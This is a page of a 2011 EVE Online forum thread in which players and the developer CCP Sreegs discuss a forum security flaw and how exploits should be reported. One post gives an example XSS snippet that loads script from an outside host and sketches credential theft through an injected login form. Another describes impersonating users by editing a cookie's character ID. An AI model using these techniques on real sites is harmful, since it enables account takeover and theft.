open All Channels
seplocked EVE Information Portal
blankseplocked New Dev Blog: New Forum Security Blog - Cookie Derp
 
This thread is older than 90 days and has been locked due to inactivity.


 
Pages: 1 2 3 4 5 [6] 7 8 9

Author Topic

Kepakh
Posted - 2011.04.12 12:08:00 - [151]
 

Remember the proverb...

Jimmae
Posted - 2011.04.12 12:11:00 - [152]
 

Edited by: Jimmae on 12/04/2011 12:16:42
Originally by: kakmonstret
Edited by: kakmonstret on 12/04/2011 12:05:20
Originally by: Jimmae
Originally by: Kepakh
Originally by: Kristina Vanszar
Standard HTML element, which is showing you ANOTHER website

See: iFrame

The script wouldn't be on the Forum, it would be hosted by another website, and therefore executed. but it would look like it is on the forums.


Whatever you inject into a frame still needs to be processed at CCP web server and CCP Sreegs clearly said that no script will pass nor there is any evidence anyone has achieved that.


Did you even read what he wrote?

1. I present you with an injected login form.
2. You fill out said form.
3. It sends your credentials to me.
4. ???
5. PROFIT

PS: Remember the proverb!

PPS: A very simple example on how to include a .js file from an external source using an onclick handler:
<div onlick="(s=(d=document).createElement('script')).src='www.bit.ly/123';d.getElementsByTagName('body')[0].appendChild(s)">


Okay people have you ever done stuff like this? Regarding the above example a filter to filter out js will hopefully catch that. Now this being the CCP webdev clowns we can't be to sure.

Regarding frames they can load any other content on the web. If CCP doesn't have some very interesting check on their server that loads the iframe target and checks for js there it would not be able to do anything. In any way there is no way CCP can filter content on a remote site loaded in a frame. Because that content is *not* loaded by their server, instead it is only loaded by your browser. If the server does a check for frames and check their target the only thing it can do is to remove the frame completely. That such a check exists I would say is very unlikely.

Edit:
And all nice theory was blow away by no frames allowed. Well well nice try. Very Happy


Script injection via HTML doesn't require frames at all and there are many ways to camouflage and obfuscate the necessary code unless you purge the HTML tags of ANY attributes. Some are browser specific, or even specific to a certain version. Some aren't. Writing a proper sanitation routine for this kind of stuff is VERY difficult. I was tasked with that once. Eventually I convinced my superior that it was futile and that we had to use a different approach.

Edit: Spelling

GKO
Posted - 2011.04.12 12:16:00 - [153]
 

Hey Sreegs,

I dont agree with what your company did here, but the way you are handling all this nerd rage is somehow special. Keep up the good work (as in answering questions/feedback) and try to spread some of that to other departments. Some could really use that help...

Another topic: we could use you in the tobacco industry on more serious topics, hit me up in a private mail if you are interested.

.
G K O
.

Dray
Caldari
Euphoria Released
HYDRA RELOADED
Posted - 2011.04.12 12:19:00 - [154]
 

TL:DR

We're still getting the crap new forums?

kakmonstret
Posted - 2011.04.12 12:26:00 - [155]
 

Originally by: Jimmae
Edited by: Jimmae on 12/04/2011 12:16:42

Script injection via HTML doesn't require frames at all and there are many ways to camouflage and obfuscate the necessary code unless you purge the HTML tags of ANY attributes. Some are browser specific, or even specific to a certain version. Some aren't. Writing a proper sanitation routine for this kind of stuff is VERY difficult. I was tasked with that once. Eventually I convinced my superior that it was futile and that we had to use a different approach.

Edit: Spelling


If the filter is based on a list of a limited acceptable list of tags and attributes it would go a long way towards stop js. But yes the huge amount of ugly HTML hacks done by browser vendors is a huge problem.

CCP Sreegs

Posted - 2011.04.12 12:27:00 - [156]
 

Originally by: Misanth
Originally by: Kuroki Meisa Kennedy
Originally by: mazzilliu
apparently the guy who first reported the issue and later got banned said that his initial exploit report was incomplete, but there was no ccp effort to get him to elaborate.

perhaps it would be an improvement to have some sort of followup for security related reports, in case the reporter does not understand how to properly demonstrate an exploit, to try to get him to communicate clearly, rather than brush them off as another incomplete bug report or potential troll. i think if that happened the forums might have gone down some time sooner.


+1 I also feel just killing the messenger is wrong and makes the P in CCP stand for police.


Communication is not CCP's strongest side, never has been. They misunderstand players, we misunderstand them. They present stuff in a way that aggravates the playerbase, even tho it could easily be made in a more appealing fashion. Etc.

I gave up petitioning CCP for now, last couple of petitions they just gave me standard replies asking for information I already submitted in the first petition. It is no point raising your voice when you talk with the deaf.


For security matters at least the best method of contact is security@ccpgames.com. I can't attest to what anyone else does in any other system but that goes directly to me.

CCP Sreegs

Posted - 2011.04.12 12:28:00 - [157]
 

Originally by: Makko Gray
I find it interesting that HTML could be injected into a signature but not script and really hope you do not look at the use of the script tag as the only indicator of script injection as it can also occur on HTML attributes and through various encoding techniques (some browser specific).

There are some good XSS cheat sheets you can check against for testing cross site scripting vectors such as this one: http://ha.ckers.org/xss.html

Also .NET & C# rocks as long as you know what your doing (ASP.NET WebForms is a bit sucky though).


In essence there was only an allowed subset of HTML rather than a disallowed subset.

We're aware of this website and I've used it myself in the past. Thanks for the tip though!

Whitehound
The Whitehound Corporation
Frontline Assembly Point
Posted - 2011.04.12 12:30:00 - [158]
 

Originally by: Devblog
From: Duderino24@poomail.com
Subject: YOU GUYS ARE IDIOTS LMAO
Body: Hey I just wanted to let you know how much you smell terrible and also how bad your posts are. I found a giant gaping hole in one of your systems. If you want to know how I did it you can go jump in a lake lmao!

And here is an example of a good exploit report:

From: Cooldude@brosef.com
Subject: Important - Vulnerability found in System X ...

The good exploit reports need to be send to: Faildude@eve-online.com.
In urgent cases can one send messages to: HookersAndBooze@eve-online.com.

Dray
Caldari
Euphoria Released
HYDRA RELOADED
Posted - 2011.04.12 12:43:00 - [159]
 

Originally by: GKO
but the way you are handling all this nerd rage is somehow special.


They are handling nerd rage the same way we all do, they're ignoring it.

What I know about web/forum coding is on a par with CCP's testing atm (<-- did you see what I did there?).

Joking aside there's a worry trend developing at CCP regarding quality and excellence which they were so proud of, I've had my fair share of rants and "nerd rage" because of what they've done in the past but it's never been enough to pack up and leave, the good has always out weighed the bad and tbh the bad was never close enough to tip the scales but as time goes on it's not as big a gap as it used to be, and if I'm brutally honest the current forum fiasco is bad but it wouldn't cause me to quit not even close to it.

The only thing in recent times that really made me sit up and think "wtf" was the inane comment about the research showing that more new content is better than fixing old problems in terms of taking the game forward during a Q&A at the fanfest, 2009 or 2010 I think, I could be wrong here but I'm guessing that the research that showed that would not hold up if Eve was the only game that it was applied to, simply because Eve is a very niche game, the average age of the player base and the sandbox nature of the game makes it a stand alone MMO for me, like I said I could be wrong but I honestly believe I'm not, and with that in mind that incident more than any other, not T20 or the train wreck of the new forums, is the single most worrying thing for me regarding CCP's attitude and the future of the game.

CCP Sreegs

Posted - 2011.04.12 12:59:00 - [160]
 

Man long posts like this are really hard to respond to but I'll give it a shot ugh I hate this editor... :mad:

Originally by: Florestan Bronstein

The widespread perception in the shc thread was that the only way to get CCP to act fast is to publicize and exploit the vulnerabilities.

CCP has a long history of being extremely slow to react to exploits in other parts of the game (even exploits that are not just "bugs" such as the Monkeysphere incident).

One frequently voiced concern was that the new forums must be taken down before the weekend or else the risk of "serious" exploits getting into the wild would become too high.

Are you convinced that the forums would have been shut down on Friday/Saturday if you had just received a couple of bug reports?



I can't speak to perception I can only speak to my commitments to respond. I can tell you that any and all exploits sent to that email address are actioned on. I'm exploring opportunities internally to create an escalation path to me via other methods as well but for now that's what we have. Based on the timeline I have it was less than 30 minutes from the time I became aware of an exploit to the time the forums were taken offline the first time. Less than 5 minutes on the second round when I received an email.
Originally by: Florestan Bronstein
At what times is security@ccpgames.com monitored? What's the maximum time you might not be aware of a vulnerability that has been forwarded to that mailbox?


It's monitored as long as I'm awake. I know that's a gap and as I said in the above comment I'm trying to sort out how to best bridge it. As it stands right now I'm a single point of failure, though to be fair I don't sleep much.

Originally by: Florestan Bronstein
Do you really have the internal leverage to shut down central parts of the website when the exploit has not yet been observed in the wild?


In this particular instance I didn't have to test that but if I hadn't been able to get in touch with people I had the resources available to act on what needed to be acted on. This is really an internal process question that's kind of hard to answer, but from my perspective I've always done what I thought needed to be done in the course of my career and it hasn't served me wrong thus far.

Originally by: Florestan Bronstein
There were some reports that parts of the exploits were applicable to EVE Gate - I remember someone mentioning that it is possible to write evemails from unsubscribed accounts etc - was EVE Gate not taken down because these claims are simply not true or because EVE Gate is a too central/integrated part of the EVE experience (and cost/benefit did not justify shutting it down)?


Eve Gate was not taken down because, to our knowledge, you can't do anything from EVE gate that is malicious. We've tested the email sending you're referring to and while I'm not saying it's impossible, we've never been able to duplicate it. We believe a user being able to post on the forums who shouldn't have may be related to the forums trusting the EVE Gate authentication. If you're aware of any real issues with EVE Gate then let me know but to date we've not found anything. I don't base my assessments on cost/benefits but rather risk.

Originally by: Florestan Bronstein
Some people claimed part of the vulnerabilities had already been mentioned on forums and/or reported to CCP during the public testing of the new forums. Can you comment on that?


Not at this time. The post mortem analysis isn't done until after the existing incident is closed. That means any investigation of this nature is forthcoming, but not an afterthought.

I think I've already addressed script obfuscation and such but if that doesn't suffice let me know. I'm running out of space.

I'll give some thought to the idea in your edit.



CCP Sreegs

Posted - 2011.04.12 13:00:00 - [161]
 

Originally by: Othran
Apologies if this has been directly answered - I have looked and don't see it.

CCP Sreegs - did the security team test the new forums for common vulnerabilities before they went live?

I'd expect every company to pen test internet-facing assets prior to any deployment to a live environment. I'm just curious who, if anyone, was responsible for testing in this instance.


Third parties did do an assessment. The rest I can't comment on for the time being.

Elvis Preslie
Posted - 2011.04.12 13:01:00 - [162]
 

Originally by: Marconus Orion
First in a soon to be rage thread.

This is a perfect example of spam, unsolicited post relating nothing to the subject, of the thread.

STOP MAKING POSTS unless you have something respectful or productive to say about the thread AND read all posts in the threads up until the one you're posting, to make sure you address all of them.

If you dont have something nice to say, dont say it.

Raid'En
Posted - 2011.04.12 13:02:00 - [163]
 

Edited by: Raid''En on 12/04/2011 13:04:20

still raging about this event, but must admit that CCP Sreegs seems like a really cool guy.

the current whining level is however pretty high ; seems it's back to what is was before fanfest and the eve forever trailer who stfu everyone for a moment.

seems botting, which was one of the big rage at this moment, have currently a working answer but...
was not enough. nullsec guys are still raging about ano change.
we want more. more actions. more words.
if we could have that much dev answers on other blogs it would be really cool.

forum whine level won't drop for long term before you give us, either a good bone, or something real. whiners won't listen if you don't do that.
and something that is not here to make forget a mistake, not a + which is at the same time of a -, but a real +, with nothing to hide.

CCP Sreegs

Posted - 2011.04.12 13:05:00 - [164]
 

Originally by: Ban Doga
Edited by: Ban Doga on 12/04/2011 07:38:59
Originally by: Ban Doga
Edited by: Ban Doga on 11/04/2011 09:53:23
Originally by: Bomberlocks
We'll see what Sreegs posts in his blog, but I'm not entirely convinced that CCP will be honest as to the extent of the problem as I think it might open them up to possible legal problems.


The blog will reiterate the statements already made.
This will include "injection of HTML", "user data was not at risk" and "security's job is to react to issues - not to prevent them by reading code".
It will contain a more lengthy and (slightly) more detailed explanation of "What" happened but not "Why".

Questions regarding "Why" will be met with "Policy says 'No'", "I already explained that", "I say what I said" and "Asking about bans or warnings could get you a ban or warning yourself".


And I'll be delighted to be wrong...

Not too disappointed I wasn't wrong.

I find it a bit odd that you cast away that "the method by which your information would have been at risk would have been in the form of malware, session theft or keylogging of your local machine" with "it's always a best practice to keep your computers safe".
If that's the stance on security could you please get someone to get rid of the "You are leaving CCP-land. Evil people might be trying to attack your computer." warning when following links in the forum. It's the same thing and you said "I'm stating outright that customer data was never at risk.".
So I guess we don't need that warning...


I'm also wondering about your two example mails to report vulnerabilities.
None of them state "I will continue" or "I will stop", yet you seem to imply the first one will continue but the second won't.
What's the magic word/phrase/indicator here?


Do you also agreed that one has to make actual use of a (potential) exploit at least once to confirm it is there?


I'm really not quite sure what you're trying to say here aside from what appears to be a questioning of my honesty without any meat. While I'll be the first to admit I don't know everything there is to know in this world, I've put my cards on the table. If you're going to insinuate that I am incorrect I'd ask that you at least spend the time to say how instead of "your a liar".

Responsible exploit testing insinuates that you verify its existence then report it rather than continuing to abuse it. That's the line. If that's not clear enough or if you're uncertain as to your ability to draw that line then I'd posit that perhaps you're not in a position where you should be doing such things.

Kristina Vanszar
Caldari
Posted - 2011.04.12 13:05:00 - [165]
 

Originally by: CCP Sreegs
Originally by: Othran
Apologies if this has been directly answered - I have looked and don't see it.

CCP Sreegs - did the security team test the new forums for common vulnerabilities before they went live?

I'd expect every company to pen test internet-facing assets prior to any deployment to a live environment. I'm just curious who, if anyone, was responsible for testing in this instance.


Third parties did do an assessment. The rest I can't comment on for the time being.


So some third partie... ?idiots? tested ?something? and CCP belived them?
And as you can't comment, someones head has to roll....

Beerstien
Caldari
Sanctum Scala Caeli
Deus Malus
Posted - 2011.04.12 13:08:00 - [166]
 

Edited by: Beerstien on 12/04/2011 13:39:12
Originally by: CCP Sreegs

I could make up a completely arbitrary date that would mean nothing whatsoever if that would make you feel better?


Lol nice answer, keep up the good work Smile
Oh and remember to breathe Very Happy

CCP Sreegs

Posted - 2011.04.12 13:14:00 - [167]
 

Originally by: Moron78
I know crap about computers, forums and all. So for me, as a regular customer, this is an issue of trust. Since CCPs notice on the forums was rather scarce when the forum thing hit I did what I usually do for stuff CCP is being coy about, Kugu and Scrapheap. (Well, the latter no more.) Now as I said I donít know much about this, but what was shown to be done on SHC seemed really basic. Which I gather to be the gist of the discussion thread over on Kugu also.

And CCP let it past. Sreegs, you say in the blog that you havenít been able to get in scripts that would run malware, key loggers and stuff of those forums. But you are by no means sure. And you even very inelegantly try to put it on the end-used. (ďEven were someone able to have injected script the method by which your information would have been at risk would have been in the form of malware, session theft or keylogging of your local machine rather than some window into our secure environment.Ē) Now to not get off track, I recognise that only to a very limited degree can CCP be responsible for what takes place at my computer. But, CCP made a forum where you are not ruling out that keyloggers etc could be embedded, and by leaving a rather obvious security hole for the computer savvy.

And regardless of that as I understand it the hole is by no means insignificant to CCP as it enabled reading of all subforums, including subforums where stuff potentially under NDA could be discussed. (Iím assuming that NDA information may be discussed in the closed CMS forum.)

So, my question. If CCP let this slip by what else have you not been able to catch? I hope that this is a case of Sreegsí department being bypassed in internal processes. But as Sreegs says, they arenít about to tell us. My issue with leaving this undisclosed is that I no longer have any trust in CCP when it comes to security measures. Why Sreegs would I trust you to rectify and make a secure forum- or anything else Ė when the last attempt potentially could have exposed end users and opened NDA information to the world?


I believe you misunderstand my statement. From a security perspective the only computer in the world you can be 100% certain of being secure is one that is in a vault and turned off. For me to come out and say EVERY SINGLE POSSIBLE EXPLOIT EVER WAS IMPOSSIBLE ON THE FORUM would be blowing sunshine up your rear. I'm not sure how you could decide that my suggestion that you change your information and run a scan "just in case" is placing the blame on the end user, but I'll just say it couldn't be farther from the truth. It's a precaution and one I think people should practice fairly often as there are a lot of sites on the internet that take things far less seriously than we do.

We've performed an audit of sensitive forums to see who saw what.

I'll ask that you not trust me personally to make a secure forum because I don't make forums. My role is to eradicate the problem and make certain you folks are aware of the situation while also handling an internal investigation. You don't have to remind us of the value of NDA'd information because it's our NDA. Nobody stands to lose more than CCP in that particular case.

Niraia
Seekers of a Silent Paradise
Posted - 2011.04.12 13:14:00 - [168]
 

Originally by: CCP Sreegs
Originally by: Othran
Apologies if this has been directly answered - I have looked and don't see it.

CCP Sreegs - did the security team test the new forums for common vulnerabilities before they went live?

I'd expect every company to pen test internet-facing assets prior to any deployment to a live environment. I'm just curious who, if anyone, was responsible for testing in this instance.


Third parties did do an assessment. The rest I can't comment on for the time being.


Are they still being paid? Are the ******ed web developers who were responsible? How about the people who hired them?

I can't see how anyone can feel safe with this stuff, or confident in the company and its leadership, until the answer to each of those questions is no.

CCP Sreegs

Posted - 2011.04.12 13:15:00 - [169]
 

Originally by: Smagd
Edited by: Smagd on 12/04/2011 08:59:35
Maybe I shouldn't say this, but my confidence is a bit shaken (not stirred).

I can quote at least two historic instances where people have been trying to point CCP to an issue, and no petition would help until someone went to the forums and made it public:

T20's Dev Hax would probably serve as a good example of how not to report issues, but Dark Shikari's Trade Window Scam is certainly an example of a correct way to do it - and it STILL took a forum threadnaught.

At this point I'm not really sure that any "procedures put in place" to make it easier to get CCP to listen actually works.

In the light of the current forum "cookie derp" I may have become a little hard to convince that emails sent to that fancy security email address are treated with any better priority sorting than critical petitions.

Better than "Hey that subject line looks important".


My intent is not to be rude, but I'd like to point out that the security email was established because I was concerned about the feedback loop. If you haven't used it I don't find encouraging others not to because a completely separate process hasn't worked in the past to be a very valid exercise.

TLWE
Polish Lords' Confederacy
Posted - 2011.04.12 13:18:00 - [170]
 

We all hope the new and even more improved now forums will be back soon. Thanks to your dedicated work and craftsmanship in... python. Python? Really? Oh well. Good work. Keep it up and do not give up. Smile

CCP Sreegs

Posted - 2011.04.12 13:19:00 - [171]
 

Originally by: Hel O'Ween
What this whole damage control dev blog - and the discussion around it - happily ignores, is the fact that after the forums were taken down the first time and went online again with an assuring "we fixed it, everything's fine now" statement accompanying it, the problems were still there!

Only after another demonstration, they were put offline. How assuring is this for us?

Oh, and thank you very much for making clear that your paying customers are to blame for this, as they didn't write the petitions/bug reports in such a way that you don't have to do the research yourself. I'd suggest you scrap every report that has no compilable code attached to it. Anything else can't be taken serious.


I could be wrong but I seem to recall the statement being that the known exploits were fixed.

Nobody's ever insinuated that this is anything other than our fault so I apologize that you feel that was the case.

Mister Rocknrolla
Posted - 2011.04.12 13:21:00 - [172]
 

Originally by: CCP Sreegs

Responsible exploit testing insinuates that you verify its existence then report it rather than continuing to abuse it. That's the line. If that's not clear enough or if you're uncertain as to your ability to draw that line then I'd posit that perhaps you're not in a position where you should be doing such things.


^^This is the clearest definition on "is it abuse or is it testing a possible exploit" I've read.


Kristina Vanszar
Caldari
Posted - 2011.04.12 13:26:00 - [173]
 

Originally by: Mister Rocknrolla
Originally by: CCP Sreegs

Responsible exploit testing insinuates that you verify its existence then report it rather than continuing to abuse it. That's the line. If that's not clear enough or if you're uncertain as to your ability to draw that line then I'd posit that perhaps you're not in a position where you should be doing such things.


^^This is the clearest definition on "is it abuse or is it testing a possible exploit" I've read.




Sorry to say that, but when i find a bug on some website, i am going as deep as possible into it, either there is no more deeper or the site is broken, happend 2 times this year, and the admins, were pretty much ****ed when i told them or when they noticed, but short ater they've been verry thankful.

So, i do not understand how you can create a line between testing and abusing,

for me abusing is, stealing informations, using the tool/site in a way to harm people.

I understand that you can not confirm that none of the "hidden" informations have been copied,
so you're acting on a "we assume it has been stolen/copied" policy, is that right?

Whitehound
The Whitehound Corporation
Frontline Assembly Point
Posted - 2011.04.12 13:32:00 - [174]
 

Originally by: Niraia
Are they still being paid? Are the ******ed web developers who were responsible? How about the people who hired them?

I can't see how anyone can feel safe with this stuff, or confident in the company and its leadership, until the answer to each of those questions is no.

I heard the punishment at CCP for failures is "to answer every stupid comment the community has to offer."

Kepakh
Posted - 2011.04.12 13:32:00 - [175]
 

Edited by: Kepakh on 12/04/2011 13:49:49
Originally by: Raid'En

forum whine level won't drop for long term


Most of this fuss comes from lack of critical thinking and blowing the issue out of proportion. Panic and paranoia is difficult to stop or control.

Errors happen, all the time and everywhere. Only what matters is the results of failure investigation and steps that will follow.



What I was missing or found not stressed enough in the blog, is a message that would try to calm people down and explain that web server security is more complex than injected HTML and that there are other layers and security measures to protect the server because that is what this is about - a few individuals making drama and spreading panic. The way the blog is written, it is more about the internal processes rather than security - which is the primary concern here and you end up, despite your best intentions, dragged into the stirred drama.

Super Whopper
I can Has Cheeseburger
Posted - 2011.04.12 13:40:00 - [176]
 

Sreegs, thank you very much for engaging the community like this. While I am usually (rightly) negative about CCP, I'd like to commend you for taking the time to respond to all these concerns. Also you are to be commended for trying to explain, albeit in basic details, how the flaw worked and the security of the new forums.

I would like to know whether the new forums allow the scaling of frames to fit all resolutions or whether they've been designed to fit 1280x1024 only.

Maplestone
Myth and Peace Lords
Posted - 2011.04.12 13:46:00 - [177]
 

Edited by: Maplestone on 12/04/2011 13:47:30
One of the possible problems when news of an exploit goes public is that it creates an instant rumour mill that mutates the details and generates false reports that then make it harder and harder to isolate which issues are real and which are urban myths being re-reported.

( *hangs head in shame for no particular reason* )

Daedalus II
Helios Research
Posted - 2011.04.12 13:52:00 - [178]
 

Originally by: Whitehound

I heard the punishment at CCP for failures is "to answer every stupid comment the community has to offer."

No, it's defenestration, I saw that on youtube Laughing

Othran
Brutor Tribe
Posted - 2011.04.12 13:58:00 - [179]
 

Originally by: CCP Sreegs
Third parties did do an assessment. The rest I can't comment on for the time being.


Thank you. I can read between the lines Wink

Qordel
Caldari
School of Applied Knowledge
Posted - 2011.04.12 13:58:00 - [180]
 

Originally by: Herschel Yamamoto

The second problem was even dumber. The forum's method of telling what character you're posting as was a simple cleartext string in the cookie, of the type "lastSelectedCharacter=1840703239". Fair enough - it's a non-crazy way to remember which of your three toons to post as - except that the server just took the character ID and trusted it completely, with no checking. If I set my last ID to CCP Sreegs(which is the ID number I used above - they're easy to look up), then I could post as Sreegs, edit Sreegs' posts, and have access to all mod tools and hidden forums Sreegs can see...without ever having to actually log in to Sreegs' account. Just set your ID in the cookie, the server takes it as gospel without checking, and you're in as anyone you like.


Having the server verify it isn't enough, either. That would still be a sloppy solution. The real solution that they should have deployed (and which is pretty much Cookies/sessions-101) would be that the cookie should have contained NOTHING except a single salted hash key, so that even someone looking at the cookie would have no idea what data it contains. Not even the username or UID that it is regarding.

Then it's dead simple to match that hash key against the database of non-expired sessions and get any data you could possibly require on the server side.

I could see someone like myself who doesn't do webdev for a living making a mistake like that. Ignorance and all, you know (though almost any reference to how to handle sessions on the internet should explain it to a newbie). Professional web developers, however, should never ever make that mistake. That shoudn't be an after-release "oops". That should be a fundamental flaw that doesn't make it past the rough white-board sketch.


Pages: 1 2 3 4 5 [6] 7 8 9

This thread is older than 90 days and has been locked due to inactivity.


 


The new forums are live

Please adjust your bookmarks to https://forums.eveonline.com

These forums are archived and read-only